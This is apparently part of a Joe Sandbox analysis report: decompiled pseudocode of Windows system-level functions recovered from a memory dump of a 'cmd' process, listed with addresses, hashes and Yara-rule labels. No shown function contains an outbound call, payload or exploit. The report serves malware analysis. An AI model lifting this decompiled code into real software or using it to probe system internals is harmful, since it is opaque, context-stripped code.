				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E03BDCC50(_t86);
					L11:
					return E03C1B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x3cc8504
				E03BF2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E03C1FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E03C1B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L03BF4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E03BDCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x3cc8504
								E03BEFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E03C04F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                                                                                          0x03c04bad
                                                                                                                                          0x03c04bbf
                                                                                                                                          0x03c04bc2
                                                                                                                                          0x03c04bc6
                                                                                                                                          0x03c04bcd
                                                                                                                                          0x03c04bd9
                                                                                                                                          0x03c467fe
                                                                                                                                          0x03c46800
                                                                                                                                          0x03c04ccc
                                                                                                                                          0x03c04ccd
                                                                                                                                          0x03c04cb7
                                                                                                                                          0x03c04cc9
                                                                                                                                          0x03c04cc9
                                                                                                                                          0x03c04bdf
                                                                                                                                          0x03c04be5
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c04beb
                                                                                                                                          0x03c04bef
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c04bf5
                                                                                                                                          0x03c04bf9
                                                                                                                                          0x03c04c06
                                                                                                                                          0x03c04c0b
                                                                                                                                          0x03c04c17
                                                                                                                                          0x03c04c1c
                                                                                                                                          0x03c04c1f
                                                                                                                                          0x03c04c25
                                                                                                                                          0x03c04c33
                                                                                                                                          0x03c04c3d
                                                                                                                                          0x03c04c40
                                                                                                                                          0x03c04c43
                                                                                                                                          0x03c04c47
                                                                                                                                          0x03c04c4d
                                                                                                                                          0x03c04c53
                                                                                                                                          0x03c04c54
                                                                                                                                          0x03c04c55
                                                                                                                                          0x03c04c56
                                                                                                                                          0x03c04c5b
                                                                                                                                          0x03c04c5c
                                                                                                                                          0x03c04c63
                                                                                                                                          0x03c04c6b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c46776
                                                                                                                                          0x03c46784
                                                                                                                                          0x03c46784
                                                                                                                                          0x03c4679f
                                                                                                                                          0x03c467a7
                                                                                                                                          0x03c467af
                                                                                                                                          0x03c467ce
                                                                                                                                          0x00000000
                                                                                                                                          0x03c467b1
                                                                                                                                          0x03c467b7
                                                                                                                                          0x03c467b8
                                                                                                                                          0x03c467c1
                                                                                                                                          0x03c467d3
                                                                                                                                          0x03c467d9
                                                                                                                                          0x03c467dd
                                                                                                                                          0x03c04c94
                                                                                                                                          0x03c04c94
                                                                                                                                          0x03c04c98
                                                                                                                                          0x03c04c9c
                                                                                                                                          0x03c04ca3
                                                                                                                                          0x03c467f4
                                                                                                                                          0x03c467f4
                                                                                                                                          0x03c04cb5
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c04cb5
                                                                                                                                          0x03c04c79
                                                                                                                                          0x03c04c7e
                                                                                                                                          0x03c04c89
                                                                                                                                          0x03c04c8b
                                                                                                                                          0x03c04c8f
                                                                                                                                          0x03c04c8f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c04c89
                                                                                                                                          0x03c467c3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c467c3
                                                                                                                                          0x03c467af
                                                                                                                                          0x03c04c73
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a8a9245398b289ef107036dcc0687901cf9a916561931b4dadb3ccc911c2b587
                                                                                                                                          • Instruction ID: 7c1e307ddcc3c5dbece8e47293f86dae80c4f15e26e345d4bd1ed75c6588004d
                                                                                                                                          • Opcode Fuzzy Hash: a8a9245398b289ef107036dcc0687901cf9a916561931b4dadb3ccc911c2b587
                                                                                                                                          • Instruction Fuzzy Hash: 0241A135A002689BCB24DF69C940BEAB7B8EF45750F0500E5EA08EF280DB74DE84CF90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C04D3B Relevance: .1, Instructions: 131COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                          			E03C04D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x3ccd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E03C1FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x3cc7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E03C1B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L03BF4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E03BDCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E03C1B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E03C1F380(_t67 + 0xc, 0x3bb5138, 0x10) == 0) {
								 *0x3cc60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E03C04F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E03C04E70(0x3cc86b0, 0x3c05690, 0, 0) != 0) {
					_t46 = E03BDCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                                                                                          0x03c04d3b
                                                                                                                                          0x03c04d4d
                                                                                                                                          0x03c04d53
                                                                                                                                          0x03c04d58
                                                                                                                                          0x03c04d65
                                                                                                                                          0x03c04d6c
                                                                                                                                          0x03c04d71
                                                                                                                                          0x03c04d77
                                                                                                                                          0x03c04d7f
                                                                                                                                          0x03c04d8c
                                                                                                                                          0x03c04d8e
                                                                                                                                          0x03c04dad
                                                                                                                                          0x03c04db0
                                                                                                                                          0x03c04db7
                                                                                                                                          0x03c04db8
                                                                                                                                          0x03c04db9
                                                                                                                                          0x03c04dba
                                                                                                                                          0x03c04dbb
                                                                                                                                          0x03c04dc1
                                                                                                                                          0x03c04dc8
                                                                                                                                          0x03c04dcc
                                                                                                                                          0x03c04dd5
                                                                                                                                          0x03c04dde
                                                                                                                                          0x03c04ddf
                                                                                                                                          0x03c04de0
                                                                                                                                          0x03c04de1
                                                                                                                                          0x03c04de6
                                                                                                                                          0x03c04de7
                                                                                                                                          0x03c04de9
                                                                                                                                          0x03c04df3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c46c7c
                                                                                                                                          0x03c46c8a
                                                                                                                                          0x03c46c8a
                                                                                                                                          0x03c46c9d
                                                                                                                                          0x03c46ca7
                                                                                                                                          0x03c46cac
                                                                                                                                          0x03c46cb2
                                                                                                                                          0x03c46cb9
                                                                                                                                          0x00000000
                                                                                                                                          0x03c46cbf
                                                                                                                                          0x03c46cbf
                                                                                                                                          0x00000000
                                                                                                                                          0x03c46cbf
                                                                                                                                          0x03c46cb9
                                                                                                                                          0x03c04dfb
                                                                                                                                          0x03c46ccf
                                                                                                                                          0x03c46cd3
                                                                                                                                          0x03c04e32
                                                                                                                                          0x03c04e39
                                                                                                                                          0x03c46ce0
                                                                                                                                          0x03c46cf2
                                                                                                                                          0x03c46cf2
                                                                                                                                          0x03c46ce0
                                                                                                                                          0x03c04e3f
                                                                                                                                          0x03c04e41
                                                                                                                                          0x03c04e51
                                                                                                                                          0x03c04e51
                                                                                                                                          0x03c04e03
                                                                                                                                          0x03c04e03
                                                                                                                                          0x03c04e09
                                                                                                                                          0x03c04e0f
                                                                                                                                          0x03c04e57
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c04e1b
                                                                                                                                          0x03c04e30
                                                                                                                                          0x03c04e5b
                                                                                                                                          0x03c04e5b
                                                                                                                                          0x00000000
                                                                                                                                          0x03c04e30
                                                                                                                                          0x03c04e11
                                                                                                                                          0x03c04e11
                                                                                                                                          0x03c04e16
                                                                                                                                          0x00000000
                                                                                                                                          0x03c04e16
                                                                                                                                          0x03c04e01
                                                                                                                                          0x00000000
                                                                                                                                          0x03c04e01
                                                                                                                                          0x03c04da5
                                                                                                                                          0x03c46c6b
                                                                                                                                          0x00000000
                                                                                                                                          0x03c04dab
                                                                                                                                          0x03c04dab
                                                                                                                                          0x00000000
                                                                                                                                          0x03c04dab

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c184ae299b2ba8b932ce1445aa64fda8bfbff12900b741d49157f4a4d8037427
                                                                                                                                          • Instruction ID: 27ff5247b612c4bf80d7adca76840c66252a48b21b3b2f14143e81e80eb0ed5f
                                                                                                                                          • Opcode Fuzzy Hash: c184ae299b2ba8b932ce1445aa64fda8bfbff12900b741d49157f4a4d8037427
                                                                                                                                          • Instruction Fuzzy Hash: DF41E175A40358AFEB25DF15CC80BABB7AAEB05610F0440E9EA15DB280DB70EE54CF91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA2B28 Relevance: .1, Instructions: 129COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                          			E03CA2B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t30;
				signed int _t35;
				unsigned int _t50;
				signed int _t52;
				signed int _t53;
				unsigned int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed int _t81;
				signed int _t87;
				void* _t88;
				signed int _t90;
				signed int _t93;

				_t69 = __ecx;
				_t30 = _a4;
				_t90 = __edx;
				_t81 = __ecx;
				_v12 = __ecx;
				_t87 = _t30 - 8;
				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
					_t87 = _t87 - 8;
				}
				_t67 = 0;
				if(_t90 != 0) {
					L14:
					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
						_t75 = (( *_t87 ^  *0x3cc6110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
						 *_a12 = _t75;
						_t35 = _a8 & 0x00000001;
						_v16 = _t35;
						if(_t35 == 0) {
							E03BF2280(_t35, _t81);
							_t81 = _v12;
						}
						_v5 = 0xff;
						if(( *_t87 ^  *0x3cc6110 ^ _t87) < 0) {
							_t91 = _v12;
							_t88 = E03CA241A(_v12, _t90, _t87, _a8,  &_v5);
							if(_v16 == _t67) {
								E03BEFFB0(_t67, _t88, _t91);
							}
							if(_t88 != 0) {
								E03CA3209(_t91, _t88, _a8);
							}
							_t67 = 1;
						} else {
							_push(_t75);
							_push(_t67);
							E03C9A80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
							if(_v16 == _t67) {
								E03BEFFB0(_t67, _t87, _v12);
							}
						}
					} else {
						_push(_t69);
						_push(_t67);
						E03C9A80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
					}
					return _t67;
				}
				_t69 =  *0x3cc6110; // 0x44ec91fe
				_t93 = _t87;
				_t50 = _t69 ^ _t87 ^  *_t87;
				if(_t50 >= 0) {
					_t52 = _t50 >> 0x00000010 & 0x00007fff;
					if(_t52 == 0) {
						L12:
						_t53 = _t67;
						L13:
						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
						goto L14;
					}
					_t93 = _t87 - (_t52 << 3);
					_t58 =  *_t93 ^ _t69 ^ _t93;
					if(_t58 < 0) {
						L10:
						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
						L11:
						_t53 = _t61 & 0x000000ff;
						goto L13;
					}
					_t63 = _t58 >> 0x00000010 & 0x00007fff;
					if(_t63 == 0) {
						goto L12;
					}
					_t93 = _t93 + _t63 * 0xfffffff8;
					goto L10;
				}
				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
				goto L11;
			}
























                                                                                                                                          0x03ca2b28
                                                                                                                                          0x03ca2b30
                                                                                                                                          0x03ca2b35
                                                                                                                                          0x03ca2b37
                                                                                                                                          0x03ca2b3a
                                                                                                                                          0x03ca2b3d
                                                                                                                                          0x03ca2b44
                                                                                                                                          0x03ca2b4d
                                                                                                                                          0x03ca2b4d
                                                                                                                                          0x03ca2b50
                                                                                                                                          0x03ca2b54
                                                                                                                                          0x03ca2bb0
                                                                                                                                          0x03ca2bbd
                                                                                                                                          0x03ca2be8
                                                                                                                                          0x03ca2bef
                                                                                                                                          0x03ca2bf4
                                                                                                                                          0x03ca2bf7
                                                                                                                                          0x03ca2bfa
                                                                                                                                          0x03ca2bfd
                                                                                                                                          0x03ca2c02
                                                                                                                                          0x03ca2c02
                                                                                                                                          0x03ca2c0f
                                                                                                                                          0x03ca2c13
                                                                                                                                          0x03ca2c3b
                                                                                                                                          0x03ca2c4a
                                                                                                                                          0x03ca2c4f
                                                                                                                                          0x03ca2c52
                                                                                                                                          0x03ca2c52
                                                                                                                                          0x03ca2c59
                                                                                                                                          0x03ca2c62
                                                                                                                                          0x03ca2c62
                                                                                                                                          0x03ca2c69
                                                                                                                                          0x03ca2c15
                                                                                                                                          0x03ca2c18
                                                                                                                                          0x03ca2c19
                                                                                                                                          0x03ca2c21
                                                                                                                                          0x03ca2c29
                                                                                                                                          0x03ca2c2f
                                                                                                                                          0x03ca2c2f
                                                                                                                                          0x03ca2c29
                                                                                                                                          0x03ca2bbf
                                                                                                                                          0x03ca2bc2
                                                                                                                                          0x03ca2bc3
                                                                                                                                          0x03ca2bc9
                                                                                                                                          0x03ca2bc9
                                                                                                                                          0x03ca2c72
                                                                                                                                          0x03ca2c72
                                                                                                                                          0x03ca2b56
                                                                                                                                          0x03ca2b5c
                                                                                                                                          0x03ca2b62
                                                                                                                                          0x03ca2b64
                                                                                                                                          0x03ca2b72
                                                                                                                                          0x03ca2b77
                                                                                                                                          0x03ca2ba3
                                                                                                                                          0x03ca2ba3
                                                                                                                                          0x03ca2ba5
                                                                                                                                          0x03ca2baa
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2baa
                                                                                                                                          0x03ca2b7e
                                                                                                                                          0x03ca2b84
                                                                                                                                          0x03ca2b86
                                                                                                                                          0x03ca2b97
                                                                                                                                          0x03ca2b9c
                                                                                                                                          0x03ca2b9e
                                                                                                                                          0x03ca2b9e
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2b9e
                                                                                                                                          0x03ca2b8b
                                                                                                                                          0x03ca2b90
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2b95
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2b95
                                                                                                                                          0x03ca2b6b
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 008d6d4d58b089eef5af3a41cf4164de6c482bab588489fc529fdaa891c7ea62
                                                                                                                                          • Instruction ID: 146b3ed6885da613968b1c9bdf9dda2a73bb5f5e787e0e2bc36c078a5e350fc4
                                                                                                                                          • Opcode Fuzzy Hash: 008d6d4d58b089eef5af3a41cf4164de6c482bab588489fc529fdaa891c7ea62
                                                                                                                                          • Instruction Fuzzy Hash: 67412E77A10A265FD714DF2CD8809BAF7E9EF48218B058AA9E815CF280DB34DE01D790
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C9D466 Relevance: .1, Instructions: 123COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                          			E03C9D466(signed int __ecx, unsigned int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v9;
				intOrPtr _v16;
				short _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				signed int _t67;
				signed char _t75;
				short _t84;
				signed int _t87;
				short* _t89;
				unsigned int _t90;
				signed int _t95;
				void* _t98;
				signed int _t99;

				_v8 =  *0x3ccd360 ^ _t99;
				_t90 = __edx;
				_v36 = __ecx;
				_v20 = 0;
				_v40 = __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x3cc6114 & 0x0000ffff;
				_v28 = 0;
				_t87 = E03C9DDF9(__edx, _a4, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x3cc6114 & 0x0000ffff,  &_v24,  &_v28, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x3cc6114 & 0x0000ffff,  &_v9);
				_v32 = _t87;
				if(_t87 != 0xffffffff) {
					_t75 =  *(__edx + 0x1c) & 0x000000ff;
					_v20 = 1;
					_v16 = 1;
					 *0x3ccb1e0( *__ecx, (_t87 << _t75) + __edx, _v24 << _t75);
					_t53 =  *( *(__ecx + 0xc) ^  *0x3cc6110 ^ __ecx)();
					_t69 = _t53;
					if(_t53 < 0) {
						_t88 = _v16;
					} else {
						_t69 = 0;
						_t98 = 0;
						_t89 = ( *(__edx + 0x1e) & 0x0000ffff) + __edx + _v32 * 2;
						asm("sbb eax, eax");
						_t67 =  !(_v24 + _v24 + _t89) & _v24 + _v24 >> 0x00000001;
						if(_t67 > 0) {
							_t84 = _v20;
							do {
								if( *_t89 == _t69) {
									 *_t89 = _t84;
								}
								_t89 = _t89 + 2;
								_t98 = _t98 + 1;
							} while (_t98 < _t67);
						}
						goto L2;
						L18:
					}
				} else {
					_t69 = 0;
					L2:
					_t88 = _t69;
				}
				_t95 = _v28;
				if(_t95 != 0) {
					_t95 =  ~(_t95 <<  *(_t90 + 0x1c) >> 0xc);
					asm("lock xadd [eax], esi");
				}
				if(_t88 != 0) {
					_t88 = _a4;
					E03C9D864(_t90, _a4, _v40, 2, 0);
				}
				if(_v20 != 0) {
					E03BEFFB0(_t69, _t90, _t90 + 0xc);
				}
				return E03C1B640(_t69, _t69, _v8 ^ _t99, _t88, _t90, _t95);
				goto L18;
			}

























                                                                                                                                          0x03c9d475
                                                                                                                                          0x03c9d47b
                                                                                                                                          0x03c9d492
                                                                                                                                          0x03c9d49e
                                                                                                                                          0x03c9d4a4
                                                                                                                                          0x03c9d4ac
                                                                                                                                          0x03c9d4bc
                                                                                                                                          0x03c9d4be
                                                                                                                                          0x03c9d4c4
                                                                                                                                          0x03c9d4cc
                                                                                                                                          0x03c9d4dc
                                                                                                                                          0x03c9d4e1
                                                                                                                                          0x03c9d4f5
                                                                                                                                          0x03c9d4fb
                                                                                                                                          0x03c9d4fd
                                                                                                                                          0x03c9d501
                                                                                                                                          0x03c9d53d
                                                                                                                                          0x03c9d503
                                                                                                                                          0x03c9d507
                                                                                                                                          0x03c9d50e
                                                                                                                                          0x03c9d510
                                                                                                                                          0x03c9d520
                                                                                                                                          0x03c9d524
                                                                                                                                          0x03c9d526
                                                                                                                                          0x03c9d528
                                                                                                                                          0x03c9d52b
                                                                                                                                          0x03c9d52e
                                                                                                                                          0x03c9d530
                                                                                                                                          0x03c9d530
                                                                                                                                          0x03c9d533
                                                                                                                                          0x03c9d536
                                                                                                                                          0x03c9d537
                                                                                                                                          0x03c9d53b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9d526
                                                                                                                                          0x03c9d4c6
                                                                                                                                          0x03c9d4c6
                                                                                                                                          0x03c9d4c8
                                                                                                                                          0x03c9d4c8
                                                                                                                                          0x03c9d4c8
                                                                                                                                          0x03c9d540
                                                                                                                                          0x03c9d545
                                                                                                                                          0x03c9d555
                                                                                                                                          0x03c9d55a
                                                                                                                                          0x03c9d55a
                                                                                                                                          0x03c9d560
                                                                                                                                          0x03c9d562
                                                                                                                                          0x03c9d56e
                                                                                                                                          0x03c9d56e
                                                                                                                                          0x03c9d577
                                                                                                                                          0x03c9d57d
                                                                                                                                          0x03c9d57d
                                                                                                                                          0x03c9d594
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0bb366f97e44826781617910920aaa2418f428d5613cdb2e43e42e9a297fef40
                                                                                                                                          • Instruction ID: 6d7fe1674cf64b817ba3d6560b7784e442d10897b4cf20c93c703b0611583fd6
                                                                                                                                          • Opcode Fuzzy Hash: 0bb366f97e44826781617910920aaa2418f428d5613cdb2e43e42e9a297fef40
                                                                                                                                          • Instruction Fuzzy Hash: 96419271A001299BDF14DFA9D889ABEF7B5FF88314B16416AE816EB240D730DE01CB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BE8A0A Relevance: .1, Instructions: 120COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                          			E03BE8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x3ccd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E03C1B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E03BEE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x3bb1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E03C01DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03C13C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E03BE8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                                                                                          0x03be8a0a
                                                                                                                                          0x03be8a1c
                                                                                                                                          0x03be8a23
                                                                                                                                          0x03be8a2e
                                                                                                                                          0x03be8a30
                                                                                                                                          0x03be8a36
                                                                                                                                          0x03be8a3c
                                                                                                                                          0x03be8a3e
                                                                                                                                          0x03be8a4a
                                                                                                                                          0x03be8a52
                                                                                                                                          0x03be8a9c
                                                                                                                                          0x03be8aae
                                                                                                                                          0x03be8a58
                                                                                                                                          0x03be8a5e
                                                                                                                                          0x03be8a6a
                                                                                                                                          0x03be8a6f
                                                                                                                                          0x03be8a75
                                                                                                                                          0x03be8a7d
                                                                                                                                          0x03be8a85
                                                                                                                                          0x03be8a86
                                                                                                                                          0x03be8a89
                                                                                                                                          0x03be8a93
                                                                                                                                          0x03be8a99
                                                                                                                                          0x03be8a9b
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8aaf
                                                                                                                                          0x03be8abe
                                                                                                                                          0x03be8ac3
                                                                                                                                          0x03be8acb
                                                                                                                                          0x03be8ad7
                                                                                                                                          0x03be8ae0
                                                                                                                                          0x03be8af1
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8af1
                                                                                                                                          0x03be8acd
                                                                                                                                          0x03be8ad5
                                                                                                                                          0x03be8afb
                                                                                                                                          0x03be8afd
                                                                                                                                          0x03be8aff
                                                                                                                                          0x03be8b07
                                                                                                                                          0x03be8b22
